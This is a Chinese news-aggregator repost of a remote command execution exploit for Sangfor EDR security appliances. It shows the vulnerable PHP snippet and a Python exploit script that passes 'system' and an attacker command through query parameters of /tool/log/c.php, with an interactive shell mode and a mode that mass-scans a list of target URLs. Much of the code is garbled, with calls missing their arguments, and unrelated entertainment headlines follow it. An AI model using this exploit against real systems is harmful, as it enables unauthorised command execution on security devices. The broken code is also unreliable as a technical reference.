您的位置 >首页 > 头条 > 新闻正文

深信服edr设备远程命令执行漏洞

发布时间: 2021-03-07 04:57:19来源:谷狗搜 阅读

RCE

echo "<p><b>Log Helper</b></p>";
$show_form;

跟入show_form

/**
 * 显示表单
 * @param array $params 请求参数
 * @return
 */
$show_form = function use {
    extract;
    $host  = isset  ? $strip_slashes  : "127.0.0.1";

exp:

# -*- coding: utf-8 -*-
# @Time : 2020/8/17
# @Author : Angel
# @File : edr.py
# 感谢大佬提供Command execute部分代码


import requests
import re
import urllib3
import sys
urllib3.disable_warnings

def hello:
    print 
    print 
    print 
    print 
    print 
    print 
    print 
    print 

def readFile:
    list=[]
    keywords = open
    line = keywords.readline.strip
    while :
        list.append
        line = keywords.readline.strip
    keywords.close
    return list


def log:
    save = file+".txt", "a+")
    save.write+"n")
    save.close


def rce:
    headers={
        'Connection': 'close',
        'Cache-Control': 'max-age=0',
        'Upgrade-Insecure-Requests': '1',
        'User-Agent': 'Mozilla/5.0  AppleWebKit/537.36  Chrome/84.0.4147.125 Safari/537.36',
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
        'Sec-Fetch-Site': 'none',
        'Sec-Fetch-Mode': 'navigate',
        'Sec-Fetch-User': '?1',
        'Sec-Fetch-Dest': 'document',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9'

    }

    url="{}/tool/log/c.php?strip_slashes=system&host={}".format
    print url
    try:
        response = requests.get
        response.raise_for_status
        response.encoding = "utf-8"
        #print response.text
        res=re.findall<pre><form',response.text,re.S)
        response.close
        print
        return "+"
    except:
        print
        return "-"

if __name__ == '__main__':
    if len < 2:
        hello
    else:
        if sys.argv[1] == "url":
            while 1:
                command = raw_input
                if command:
                    print 
                    rce
                else:
                    print 
                command = ""

        elif sys.argv[1] == "file":
            if  < 3:
                print "Command: python edr.py file url.txt"
            else:
                for i in readFile:
                    print 
                    if rce == "+":
                        log
                    else:
                        log
        else:
            hello

参考链接:

https://www.cnblogs.com/potatsoSec/p/13520546.html

为您推荐的相关新闻

生前遇人不淑?蒋坤伟借高以翔好友身份牟利,高以翔二哥怒发声明

向佐斩获年度综艺男艺人,向太台下笑开花了,儿媳妇没得同款?

这名24岁的男子在成都泄露了确认人的信息,并受到行政处罚。四川省委书记表达了他对网络暴力的立场

余生请多指教大家已经期待很久了 是在肖战最火的时候拍摄的

Bigbang太阳纪录片告白妻子 曝光了长达8集的纪录片

悬疑推理电视剧前十名2020 大家都热衷于追捧悬疑电视剧